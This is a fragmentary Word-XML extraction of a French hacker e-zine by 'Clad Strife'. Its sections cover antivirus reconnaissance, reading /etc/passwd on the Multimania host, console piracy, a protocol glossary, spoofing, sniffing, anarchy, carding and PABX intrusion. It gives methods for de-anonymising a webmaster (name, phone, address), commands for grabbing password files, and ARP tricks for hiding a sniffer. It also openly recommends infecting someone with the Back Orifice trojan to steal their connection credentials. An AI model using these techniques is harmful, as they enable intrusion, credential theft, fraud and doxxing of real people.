        <w:pStyle w:val="Normal"/>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TREND INTERSCAN VIRUS WALL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cherche les virus sur le: HTTP, SMTP, FTP.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cherche les magouilles sur les Applets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cherche les certificats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cherche de signatures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cherche pas les sources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Filtre les E-mails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Fait un gestionnaire de délivrance de courrier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OPSEC Compliant (NT)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OPSEC Compliant (UNIX)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fait pas de filtrage d'adresses url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Fait du filtrage de spamming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Il ne bloque pas les cookies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Les algorithmes de compression supportés: 19 types </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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détecte pas l'e-mail spoofing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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Ainsi on peut voir que TREND INTERSCAN VIRUS WALL est très fiable (plus que NORTON). Mais si cette liste est là c'est pour une raison: les réseaux utilisent toujours ces deux là (en général, attention!), pour se sécuriser. Donc il est possible d'étudier ce que fait et ne fait pas chacun de ces utilitaires, pour mieux se renseigner sur la cible! Un réseau n'utilisant que NORTON, ne sera pas assez sécurisé et présentera donc des failles (pas de filtrages mails par exemple). </w:t>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rPr>
        <w:t xml:space="preserve">2.5 Décryptage passwords Linux et failles Multimania, par Clad Strife </w:t>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fichier password s'appelle généralement etc/passwd ou etc/shadow si c'est un password caché. Et pour les systèmes utilisant les yellow pages (NIS), il est accessible par la commande ypcat passwd. N'importe quel utilisateur d'une machine, le fichier etc/passwd est disponible en lecture, et donc il est recopiable. Dans le cas de NIS, n'importe quel utilisateur d'une machine ayant accès au serveur NIS peut récupérer le fichier par la commande :ypcat passwd &gt; passwdn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 la machine utilise un mot de pass shadowed, ceux-ci sont dans le fichier etc/shadow qui est accessible en lecture uniquement par roo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ref... toutes ces techniques sont bien belles. Mais le problème du décryptage reste entier! Chaque password est soumis à un algorithme de cryptage qui ne va que dans un seul sens, donc décryptage impossible. Et que le fichier soit shadowed ou non, le pass restera crypté, la seule différence sera la facilité d'accès à ce fichier password. Mais on peut quand même essayer de le cracker, il faudrait un crackpass, un dico et prier pour que ça march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ais le répertoire etc/passwd est là et celui-ci peut fournir des informations (sur le login de l'administrateur) prenons un exemple typique, qui marche mais qui est inventé, qui ne correspond que peu à la vérité!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http://www.multimania.com/innvènechionne/et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 pour résultat, "ACCESS FORBIDDE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http://www.multimania.com/innvènechionne/etc/passwd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 pour résulta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root:*:0:0:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Charlie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;:/root:/bin/csh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innvènechionne:*:64501:150::0:0:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Nonyme</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FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Alain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">:/web/mygale/innvènechionne:/bin/sh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u enco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innvènechionne:*:64501:150::0:0:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Nonyme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> MMP:/web/mygale/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Alain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">:/bin/sh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egardez ce qui est en rouge. sur le site innvènchionne, il est, à priori, impossible de savoir qui dirige ce site (personnellement parlant). Grâce à cette faille, vous savez maintenant que le webmaster du site est Mr Alain Nonyme (s'il n'a pas menti dans ses infos multimania, lors de la création du site, ce qui est rarement le cas étant donné que Multimania n'a pas le droit de révéler les infos privées des gens, haha!). Donc votre recherche ne s'arrête pas là! Vous pouvez obtenir son Adresse locale (exemple: paris543.club-internet.fr), en faisant un tracert de son adresse IP (faut l'avoir). Et vous aurez le nom de la ville du gars, et le pays ou il est grâce à l'identifiant fr, be, ch et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onc possibilités d'avoi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Le nom, prénom du gar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Son numéro de téléphon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Son adress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Mais si vous voulez allez plus loin: essayez un hack sur multimania, grâce à cette faille vous savez que le login pour être root est Charlie, une fois cette étape faite, trouvez le pass, est parfois, un jeu d'enfant. Cette technique ne s'étend surement pas qu'à Multimania! Bien d'autres hébergeurs de sites doivent présenter cette faille (et pas qu'en France).</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708" w:leader="none"/>
        </w:tabs>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6 La guerre des consoles et le piratage, par Clad Strife</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a y est la guerre a commencé. Nintendo s'est imposé au Japon avec sa mascotte Mario, et Sony s'est plus qu'imposé avec la Playstation en emportant une grande part du marché! Quant à Sega, ce fut la chute libre avec la Saturn! Mais rien ne se perd rien ne se crée, et avec les fonds accumulés durand les années passées Sega a pu mettre au point, ce qui risque d'être la référence en console 128 bits! En effet son prix bas, et sa qualité graphique surpasse les consoles 32 bits, mais le rapport qualité prix fait qu'elle va se faire complètement dépasser par la Dolphin et la Playstation2. Mais c'est bien beau et le piratag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our graver un CD Playstation, il faut un graveur, etc... N'importe qui peut le faire! Mais le problème fut la lecture du CD gravé! Alors la soluce a été vite trouver, par chance: il faut patcher sa console dans une boutique spécialisée, avec la puce qui permet de lire les jeux japonais. Contre-attaque! Quelques temps plus tard, à cause de la montée en force du piratage: protections mises en place sur les CDs Playstation: les nouveaux jeux détectent la puce et empêche leur lancement. Solution? L'Action-Replay. Re-contre attaque: les nouvelles versions de la playstation empêche un branchement de l'Action-Replay!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 Nintendo quant à elle c'est pire: le marché du piratage sur la N64 est moins étandu mais plus catastrophique! Des émulateurs et des roms à la pelle sont trouvables sur les sites warez! Tout ceci est illégal, à moins de virer le rom au bout de 24 heures mais personne (ou presque) le fai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avantages pour l'industrie de la vente de CD au noir rapporte gros aux consommateurs de jeux! A 20 ou 50 francs le jeu, on ne voit pas pourquoi l'acheter en rayon! Mais comme toute chose interdite, c'est puni TRES sévèrement par la lo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émulateurs sont-ils eux aussi interdits? L'émulateur en soi, non! Mais la manière de l'utiliser le sera (Bleem exploite le bios de la playstation qui est tout droits protégé), et ULTRAHLE ne fonctionne pas sans les roms (=interdits) qui vont avec! Sur le coup un procès est déposé contre les constructeur de Bleem, par Sony. C'est évidemment une connerie de leur part: Sony, en développant des émulateurs, facilite la vente de jeux playstation, qui, par conséquent, conviennent aux utilisateurs PC. </w:t>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color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Enfin... Pour nous, joueurs fanatiques, la seule question qu'on se pose est: "Où est la fin du niveau?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>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7 Définition des protocoles, par Clad Strife</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Environnement TCP/IP:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">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DSP: AppleTalk Data Stream Protocol. Flux de données au protocole AppleTalk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RP: Address Resolution Protocol. Protocole de résolution d'adresse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HCP: Dynamic Host Configuration Protocol. Protocole d'allocation dynamique d'adresses. Permet à un équipement distant d'obtenir les informations nécessaires à l'établissement de la connexion, en particulier l'adresse IP.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TP: File Transfert Protocol. Les liens hypertexte utilisant ce protocole commencent par ftp://...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CMP: Internet Control Message Protocol.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P: Internet Protocol. La fonction ou rôle du Protocole Internet est d'acheminer les trames à travers un ensemble de réseaux interconnectés. Ceci est réalisé en transférant les trames d'un module Internet à l'autre jusqu'à atteindre la destination. Les modules Internet sont des programmes exécutés dans des hôtes et des routeurs du réseau Internet. Les trames sont transférés d'un module Internet à l'autre sur un segment particulier de réseau selon l'interprétation d'une adresse Internet. De ce fait, un des plus importants mécanismes du protocole Internet est la gestion de cette adresse Internet.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DAP: Lightweight Directory Access Protocol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DU: Protocol Data Unit, à ne pas confondre avec UDP.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OP: Post Office Protocol.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PP: Point-to-Point Protocol (IETF).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STN: Public Switched Telephone Network. Réseau Téléphonique Public Commuté.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IP2: Routing Information Protocol 2. RIP2 est utilisé pour échanger des informations de routage. Il dérive d'un premier protocole développé par Xerox (RIP). Chaque machine qui utilise un protocole RIP2 a un processus qui envoie et reçoit des datagrammes transportés par de l'UDP port numéro 520.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LIP: serial Line Interface Protocol.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NMP: Simple Network Management Protocol. Le protocole SNMP est le langage que les agents et les stations de gestion (managers) utilisent pour communiquer. C'est un protocole de type question/réponse asynchrone. Ce protocole est situé au niveau application du modèle OSI, c'est lui qui définit la structure formelle des communications. SNMP est encapsulé dans des trames UDP.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CP: Le protocole TCP est défini dans le but de fournir un service de transfert de données de haute fiabilité entre deux ordinateurs "maîtres" raccordés sur un réseau de type "paquets commutés", et sur tout système résultant de l'interconnexion de ce type de réseaux </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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DP: User Datagram Protocol. Le protocole User Datagram Protocol (UDP) est défini dans le but de fournir une communication par paquet unique entre deux processus dans un environnement réseau étendu. Ce protocole suppose l'utilisation du protocole IP comme support de base à la communication. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le protocole X25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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protocole X25 définit l'interface entre un ETTD ( Equipement Terminal de Traitement des Données ) et un ETCD ( Equipement Terminal de Circuit de Données ). Il a été adopté par le CCITT en septembre 1976. On entend souvent par X25 l'ensemble des protocoles liés à X25 et qui couvre les couches 1 à 3 du modèle OSI. Pourtant, le terme X25 désigne uniquement le niveau 3 ou niveau paquet transporté entre les champs d'information des trames LAPB </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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PB: Le protocole LAPB est le protocole de niveau 2 qui transporte les paquets X25. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les protocoles Novell:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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CAST: BroadCAST sert à diffuser les annonces du réseau informant l'utilisateur qu'il a bien reçu un message. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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MP: Burst Mode Protocol. Le BMP est en fait un type de paquet NCP. BMP a été créé afin de permettre de multiple réponses pour une seule requête et donc transférer jusqu'à 64 ko de données pour une seule requête en lecture de fichiers. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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IAG: DIAGnostic responder. DIAG est très utilisé pour analyser les LAN Netware. DIAG peut être utilisé pour tester les connexions et les configurations. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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PX: Internetwork Packets eXchange. IPX est l'implémentation Novell du Internet Datagram Protocol (IDP) développé par Xerox. IPX est un protocole datagramme sans connexion qui transmet des paquets à travers Internet et fournit aux stations Netware et aux serveurs de fichiers des services d'adressage et de routage inter réseaux. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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CP: Novell Netware Core Protocol. NCP s'occupe de l'accès ressources du serveur primaire Netware. Il fait des appels de procédures au NFSP (Netware File Sharing Protocol) . </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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IPX: Routing Information Protocol. RIPX est utilisé pour collecter, maintenir et échanger des informations de routage correctes entre les passerelles dans Internet. A ne pas confondre avec un protocole TCP/IP. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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AP : Service Advertising Protocol. Avant qu'un client ne puisse communiquer avec un serveur, il doit savoir quels serveur sont disponibles sur le réseau. Cette information est rendue disponible grâce au Novell's SAP. Le service SAP diffuse l'information sur la liste des serveurs connu à travers tout le réseau.Ces serveurs peuvent comprendre des serveurs de fichiers, des serveurs d'impression, des serveurs d'accès Netware, et des serveurs distants. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="708"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ER : SERialization. Nan ce n'est pas pour trouver des serials.. Pour assurer qu'une simple version de Netware n'est pas en train d'être chargée sur différents serveurs, l'OS diffuse des paquets appelés paquets de sérialisation pour déterminer si il y a multiple copies du même OS sur le réseau. Ces paquets ne contiennent qu'un seul champ de 6 octets appelé champ de donnée de sérialisation. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>WDOG : WatchDOG. Le WDOG fournit les validations de connexion aux stations sur le système Netware et rend compte à l'OS lorsque une connexion doit être fermée pour cause de trop longue période sans communications.</w:t>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8 Spoofing, par Clad Strife</w:t>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color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Là il est important de ne pas se tromper, le spoofing dans le sens où tout le monde l'entend n'existe pas... Ehoui, on ne peut pas flasher son IP! En revanche je crois qu'il est possible de modifier son adresse MAC (adresse de la carte réseau), mais ça reste à vérifier (faudrait s'y connaitre en électronique). Explications: le spoofing est une théorie, une hypothèse: si on arrive à spoofer on peut faire ci et cà pour mettre en danger la sécurité d'un réseau. Mais les administrateurs ne sont pas cons: si ça existaient la sécurité d'un réseau doublerait. Hors beaucoup de gens ont a pris une hypothèse pour réalité. Le sens du spoof quand on le pratique est de se faire passer, identifier, comme une machine reconnue par d'autres... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Je vous montrerais quelques exemples en images dans la partie "hacker un routeur en images". Sinon j'vais prendre quelques exemples de "déjà-vu": </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Comme celui du mail anonyme par telnet, en début de session sur un serveur mail, il est possible de s'identifier comme étant un serveur et moins se faire repérer, en tapant "helo serveur.com" (faites vous identifier par un nom de serveur du réseau à attaquer et déjà vous êtes moins grillés, c'est un peu du spoofing). Un message de salut vous sera rendu... Donc on peut se faire identifier comme un e-mail "ami" par un firewall, mais bien sur si celui-ci vérifie l'IP... Donc c'est quand même de l'email spoofing, mais on ne peut envoyer de fichiers. (pour faire du mail anonyme cf: Hacker 2020 Ultima Version) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Pour avoir le même identifiant IP qu'un réseau il faut qu'on ait un accès internet par ce réseau. Donc si c'est un réseau privé qui ne fait pas d'offre de connection, vous êtes obligés de vous LA FAIRE AVOIR cette connection sur le réseau, et que donc les admins soient au courant: grillé! </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Bon, on va donner plus d'exemples, dans le prochain chapitre. AH SI!!! J'allais oublier, on peut spoofer son IP, mais avec un troyan, Back Orifice plus précisément. Vous êtes sur la ligne tel, ben vous n'avez qu'à infecter un gars, récupérer ses pass de connection et vous connecter quand il est offline (vers 3 heures du matin par exemple) avec ses infos... Il paye à votre place, et IP changé garanti. Pourquoi? parce que ses infos déterminent où il va se connecter (club-internet, wanadoo...), et comme chaque ISP fournit un IP différent, vous voilà PARTIELLEMENT protégé (partiellement parce que si le gars se rend compte de la magouille, vous voilà bien golé, surtout que FT peut vous retrouver facilement)! Ceci est un usage de troyan que je recommande. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Dernier truc à savoir, c'est qu'on peut spoofer des trames que vous envoyez, mais le problème reste là, on ne peut pas envoyer de données juste des trames de différents protocoles, et definir si ce sont des trames à faire passer en urgence et parfois leur actions (non nocives) sur le système en face. </w:t>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9 Le sniffing, par Clad Strife</w:t>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lors le sniffing introduit: sniffer un réseau. Un réseau c'est une liaison entre 2, 3 ou plus d'adresses (machines). Les resaux permettent de faire transiter des packets d'informations encapsulés dans des informations tel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l'IP de la machine qui reçoit l'informati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les informations sur la carte réseau de la machine ciblée (tout en sachant que l'adresse MAC est propre à chaque carte réseau).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our établir la correspondance entre les adresses IP et les adresses MAC, un protocole ARP (Adress Resolution Protocol) est utilisé. Ainsi lors de l'encapsulation des données, pour éviter l'interception de ses données par une autre machine, l'adresse MAC est "écrite" en tout dernier lieu sur l'enveloppe d'encapsulation. Il y a donc 2 niveau d'authentification du destinatai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onc vous vous en doutez: quand un packet de données va être envoyée à une machine, une autre machine sur le même réseau ne pourra pas le lire car elle va comparer l'adresse MAC à la sienne pour savoir si c'est la bonne. Dans le cas échéant le système ne lit pas le packet. cependant le mode "mele" existe. Ce mode permet l'interconnection entre 2 réseaux: l'ordinateur est paramétré pour permettre le transimisson du packet de donnée à l'autre ordinateur (et donc l'ordinateur doit avoir 2 cartes réseau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n peut quand même essayer de voir si la carte d'un ordinateur suspect est ou non en mode mele. Mais est-ce possible dans tous les ca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elon une rumeur, on aurait trouvé un astuces permettant de repérer la carte réseau d'un ordinateur cible en mode mele. La marche à suivre serait assez facilement réalisab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upposons que son nom soit "LAMER". Il suffira de changer son entree dans la table ARP de votre machine : arp -s LAMER 00:FF:00:FF:00:FF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 ensuite, essayer la commande d'echo : ping LAM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 la la machine vous repond, c'est que c'est un ancien Linux, en mode me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ubliez pas de retablir l'integrite de votre table ARP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rp -d LAM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tez que cela ne donne rien avec les versions recentes de Linux ou sur un autre OS. En effet cela est du à un bug dans /linux/net/ipv4/arp.c la fonction arp_rcv0 contrôle quand envoyer les reponses ARP. Mais le test est foireux, et cela fonctionnera si l'adresse IP est bonne, même si l'adresse ARP n'est pas la mêm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programme neped.c automatise cette manipulation pour toutes les machines d'un reseau. On peut le telecharger sur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www.rootshell.com/archive-j457nxiqi3gq59dv/199809/neped.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 present pour les cochons qui veulent contrer la manoeuvre, il suffit de reconfigurer votre carte avant de declencher votre sniffeur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bin/ipconfig eth0 -arp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ela empechera votre carte reseau de repondre aux requêtes ARP, et donc d'être detectee. </w:t>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color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Bien entendu une autre technique consiste tout simplement à se faire passer pour la machine devant intercepter les données: cette méthode (parfois douteuse), s'appelle le spoofing. Pour sniffer les réseaux il existe aussi, les sniffers. Ceux-ci vont sniffers les packets, mais en ne denant souvent que les premiereres centaines d'octets (par chance la partie password, logins, et autres). Le problème est que pour utiliser un sniffer il faut avoir accès aux drivers de la carte réseau; ce qui ne devraient pas poser trop de problèmes avec un pc tournant sous Windows95, car les administrateurs des autres system windows NT, Linux... saisissent des paramètres de restrictions aux accès des drivers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>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tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>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10 Thème sur l'anarchie, par Clad Strife</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J'vais pas vous sortir les définitions du dictionnaires, vous pouvez le faire vous même... Nan j'vais parler de la mentalité anarchiste et de l'anarchie en règle généra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narchie consiste à évoluer dans un environnement qui n'est géré par aucune règle, aucun protocole. En un mot vous créez un environnement autour de vous (car c'est vous qui créez l'anarchie: le monde dans lequel vous vivez est soumis à des règles). qui est "bordélique". On peut faire de l'anarchie et on peut être anarchiste dans deux significations du mot: tout le monde peut faire de l'anarchie et désobéir aux règles, ainsi vous serez qualifié d'anarchiste, mais vous n'en avez peut-être pas la mentalité; Il faut se dire que jouer les anarchistes ne se déroule pas que dans la vie courante (les crashers sont des cybers anarchistes), mais aussi qu'être un VRAI anarchiste c'est avoir la mentalité d'un anarchiste: "Ni dieu, ni loi" "sans foi, ni loi", deux phrases qui évoque l'anarchisme, autre chose c'est qu'un vrai anarchiste à sans cesse ces paroles en tête: "j'aime pas le système dans lequel je vis: les riches et les pauvres, les puissants et les faibles. Il faut que j'agisse pour montrer ma colère". Un acte anarchiste sera ainsi interprété comme un acte de vandalisme (en règle générale), et personne va se demander qu'est-ce qui a poussé le malfaiteur à faire ceci. Alors on peut faire des actes revendiqués, pour se faire comprendre: mais si on est tout seul ça prendra pas, on vous prendra pour un merdique, une gang sera déjà plus prise au sérieux, et un groupe de plusieurs centaines de personnes....... Bien entendu il est conseillé d'avoir une raison valable d'anarchiser le système. Sur ce je vous laisse réfléchir sur ce que vous faites, pas de conneries. Au fait: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>un meurtre ce n'est pas de l'anarchisme: c'est de la folie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</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708" w:leader="none"/>
        </w:tabs>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11 Le carding, par Clad Strife</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ette méthode consiste à recharger sa carte magnétique qui est hors service par manque d'unités, à l'aide d'une autre carte magnétique pleine. Cette méthode ne marche pas pour les cartes à puces, car la puce s'auto-détériore en cas d'essais de carding.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hic: un français a trouvé comment fabriquer de fausses cartes et que, quel que soit le code tapé, la transaction soit acceptée! Il a "détourné la sécurité" selon ses termes, et ne l'a pas enlevée. Au Québec et aux Etats-Unis le problème ne se pose pas. Le système est tellement mal fait qu'on peut dévéliser un compte en banque sans codes!</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Bien entendu cette méthode demande des programmes de l'intelligence, et du matos. Maintenant on a réutilisé le mot carding pour décrire la création de fausses cartes de paiement sur le Net.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12 PABX/VMB, par Clad Strife</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s réseaux téléphoniques internes utilisés par certaines entreprises dans lesquels une intrusion est facilement possible. Le PABX, c'est en général une centrale d'aiguillage informatisée qui permet à une énorme quantités de lignes d'êtres gérées informatiquement. On peut s'y adresser de plusieurs façons: par l'intérieur (via un PC, VAX, Terminal) ou par l'extérieur: telephone, modem. Une VMB est une boite vocale, c'est une sorte de répondeur qui vous permet de recevoir des messages et d'en envoyer à d'autres correspondants. Mais pour cela, il faut que les correspondants soient sur le même serveur (la plupart des grosses entreprises en possèdent une). Une PABX a souvent la possibilité de se commuter sur le réseau externe de l'entreprise. C'est ce qu'on appelle un outdial (parfois détournab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rticle tiré de Noroute1#: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 C'est quoi un PABX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 PABX (Private Automatic Branch Exchanger) est en fait un central telephonique qui gere les appels entrants est sortants. Il gere le reseau interne aussi bien que le reseau externe. Pour vous donner un exemple: Mr Lamer travail chez Grolame &amp; Co. Monsieur Lamer veut telephoner... Pour cela, il decroche son telephone, il appuie sur `0' puis il compose son numero. Voila en gros a quoi un PABX peut servi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on y va alors. A quoi ca peut bien vous servir de savoir que Mr Lamer lamer peut phoner depuis son poste en faisant le 0' ??? D'abord vous devez comprendre a quoi ca ressemble un PA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Chaque employe a un poste bien a lui, OK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Chaque employe a une ligne directe (surement), OK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urement car le PABX ne servirait a rien sinon, eh!).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Tous les employes sont relie au PA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voyons de plus pres comment 